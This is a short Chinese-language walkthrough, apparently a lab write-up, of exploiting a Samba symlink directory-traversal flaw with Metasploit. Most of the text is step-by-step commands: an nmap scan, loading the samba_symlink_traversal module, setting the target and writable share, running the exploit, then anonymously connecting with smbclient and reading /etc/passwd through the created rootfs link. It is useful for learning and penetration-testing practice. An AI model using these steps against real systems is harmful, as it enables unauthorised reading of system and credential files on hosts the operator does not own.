Metasploit溢出sysmlink默认配置目录遍历漏洞

目的

利用sysmlink漏洞读取目标主机的passwd文件内容。

原理

Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,Samba的Sambd默认配置在可写文件共享时,存在目录便利漏洞,远程用户可以通过smbclient端使用一个对称命令,创建一个包含..的目录遍历符的软连接,可以进行目录遍历以及访问任意文件.

环境

Metasploit溢出sysmlink默认配置目录遍历漏洞_第1张图片
攻击环境

步骤

一、利用nmap工具扫描目标主机
  1. 命令nmap -sV 192.168.1.3,对目标主机进行端口扫描,发现开放445端口、139端口并且安装Samba软件,版本为3.
  2. 在终端中输入命令msfconsole,启动MSF终端。
  3. 在终端中输入命令search samba,搜索Samba的相关工具和攻击载荷。
  4. 在终端中输入命令use auxiliary/admin/smb/samba_symlink_traversal,启用漏洞利用模块,提示符就会提示进入到该路径下。
  5. 在终端输入命令info,查看需要设置的相关项,yes表示必须填写的参数。
  6. 在终端中输入命令set RHOST 192.168.1.3,设置目标主机的IP地址。
  7. 在终端中输入set SMBSHARE tmp,设置SAM可写文件。
  8. 在终端中输入exploit,开始攻击。
  9. 新打开一个终端,输入smbclient //192.168.1.3/tmp,直接回车,不用输入密码。
  10. 在终端中输入cd rootfs,进入rootfs目录,在终端下输入命令ls,列出目录。
  11. more /etc/passwd
    Metasploit溢出sysmlink默认配置目录遍历漏洞_第2张图片
    getshell

你可能感兴趣的:(Metasploit溢出sysmlink默认配置目录遍历漏洞)